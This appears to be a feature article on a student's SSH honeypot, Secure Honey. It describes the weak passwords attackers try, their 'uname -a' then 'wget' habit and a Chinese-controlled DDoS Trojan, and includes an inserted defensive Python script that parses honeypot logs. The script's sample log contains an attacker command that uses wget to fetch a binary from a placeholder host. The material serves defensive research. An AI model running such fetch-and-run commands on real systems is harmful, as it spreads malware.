How can you tell who’s up to no good when it comes to your networks and computer systems?
Simon Bell, a computer science student in his last year at the University of Sussex, has set out to help answer that question. He’s created an SSH (Secure Shell) honeypot written in C with the aim of researching the techniques of malicious attackers trying to infiltrate the network. Dubbed Secure Honey, Bell designed his honeypot as a final project, which he tracks and writes about on his site.
Hacking the Hackers:
Honeypots, for the uninitiated, are decoy systems or servers designed to track and log the activities of attackers trying to intrude into your system (SANS has a great FAQ for further reading). Instead of the attackers gaining data, the honeypot collects the actions and intrusion attempts for further analysis. The would-be hackers get nothing – and will quickly move on to the next possibly vulnerable server after a few fruitless tries.
“Something really drew me to the idea of luring hackers into a honeypot to watch how they operate and to discover what sort of techniques they may deploy to infiltrate a system,” he says. Anyone can keep up with what Secure Honey attackers are up to on Bell’s live stats page, where hacking attempts, the most commonly used passwords and more are tracked in real time.
The attackers come to Bell’s honeypot from all over the deep dark web. He initially worried that he’d have to advertise the honeypot on underground forums for the word to get out, but the script kiddies started pouring in from the day it went live, last October. He estimates Secure Honey averages around 1,000 hacks a day. Bell was most surprised by the number of hackers simply scanning for servers, like his, running SSH on port 22 (the default for SSH) that employ weak passwords. “The fact that there are so many hackers scanning for these weak servers suggests that there may be a large number of live servers out there that have weak security,” Bell says.
Tracking the Attempts:
Those accessing the honeypot have used a wide range of techniques to try to get into the network, but nearly every attacker starts with:
- The ‘uname -a’ command, which displays the complete system name and version and is the logical first step in seeing what kind of tools are needed for infiltration, followed by
- ‘wget’, used to test the server’s speed as well as to download remote files, which in the honeypot’s case are almost always malware.
Bell’s most interesting download so far was a malicious C++ program which he discovered was a Trojan DDoS tool connected to a command and control server in China, built to receive denial of service commands. “The commands instruct the server to carry out a DoS attack on a certain IP address,” Bell explains. The server could also create a botnet capable of carrying out large scale attacks. A few other Trojans have also been downloaded to the honeypot – enough to surprise Bell. He hadn’t realized there was so much malware targeted specifically toward Linux servers.
The first lesson is that passwords need to be stronger. “I was shocked to find the most common passwords being used to hack into my honeypot were “123456”, “password” and “changeme” since these passwords seem so obviously weak and easily crackable,” Bell says. “So when I researched why these passwords were being used so frequently by hackers I was amazed to see that these are the most common passwords being used to secure computer systems around the world.”
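A defender running a honeypot of their own would want to pull the same two patterns out of its logs: the most-tried passwords and the ‘uname -a’ then ‘wget’ sequence described above. The following is an added example, not Secure Honey’s code; it assumes a constructed, simplified one-event-per-line log format (the real format, field names and sample values are assumptions) and reports both.

```python
import re
from collections import Counter
# Constructed sample log in an assumed, simplified format (not Secure Honey's real layout);
# addresses are documentation ranges and the wget URL is a placeholder.
SAMPLE_LOG = """\
2013-10-12T03:14:01Z session=1 src=198.51.100.7 login user=root pass=123456 result=fail
2013-10-12T03:14:03Z session=1 src=198.51.100.7 login user=root pass=password result=success
2013-10-12T03:14:05Z session=1 src=198.51.100.7 cmd=uname -a
2013-10-12T03:14:09Z session=1 src=198.51.100.7 cmd=wget http://example.invalid/x.bin
2013-10-12T04:02:10Z session=2 src=203.0.113.9 login user=admin pass=changeme result=success
2013-10-12T04:02:12Z session=2 src=203.0.113.9 cmd=ls -la
2013-10-12T05:40:00Z session=3 src=192.0.2.44 login user=root pass=123456 result=fail
2013-10-12T05:40:01Z session=3 src=192.0.2.44 login user=root pass=123456 result=fail
"""
LOGIN_RE = re.compile(r"session=(\d+) src=(\S+) login user=(\S+) pass=(\S+) result=(\w+)")
CMD_RE = re.compile(r"session=(\d+) src=(\S+) cmd=(.*)$")

def parse(log):
    """Return (login attempts, {session: {"src", "cmds"}}); fields are assumed whitespace-free."""
    attempts, sessions = [], {}
    for line in log.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            sid, src, user, pw, result = m.groups()
            attempts.append({"session": sid, "src": src, "user": user, "pass": pw, "ok": result == "success"})
            continue
        m = CMD_RE.search(line)
        if m:
            sid, src, cmd = m.groups()
            sessions.setdefault(sid, {"src": src, "cmds": []})["cmds"].append(cmd.strip())
    return attempts, sessions

def top_passwords(attempts, n=3):
    """Most frequently tried passwords, successful or not, as on the live stats page."""
    return Counter(a["pass"] for a in attempts).most_common(n)

def recon_then_download(sessions):
    """Flag sessions that open with `uname -a` and later run wget; returns {session: (src, URL or None)}."""
    flagged = {}
    for sid, s in sessions.items():
        cmds = s["cmds"]
        if not cmds or cmds[0].split() != ["uname", "-a"]:
            continue
        for c in cmds[1:]:
            parts = c.split()
            if parts and parts[0] == "wget":
                urls = [p for p in parts[1:] if p.startswith(("http://", "https://", "ftp://"))]
                flagged[sid] = (s["src"], urls[0] if urls else None)
                break
    return flagged
```

The flagged URL is what you would pull into a sandbox for the kind of analysis Bell describes, and the password counts are what a live stats page would chart.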
Overall, Bell’s research shows just how large a hacking community there is, trying its tactics in different places in search of some sort of ‘pot of gold’. “Cyber security is a very real and constant threat,” he’s learned. “People that don’t take cyber security seriously are totally unaware that there might be a Trojan running on their machine right now; being used by criminals to hack into banks & government organizations.”
Bell’s interest in malware has ventured outside the honeypot, as well. Researching malware, he says, is more interesting, as you “get to understand how a hacker’s mind works and what techniques they’re using to exploit a system.” He recently reverse engineered a malicious version of Flappy Birds, and after graduation, he’ll continue with similar research as well as more complex malware, such as samples written in C/C++. Eventually he’d like to learn pentesting and more about ethical hacking, but for now, he’ll continue blogging and researching Secure Honey.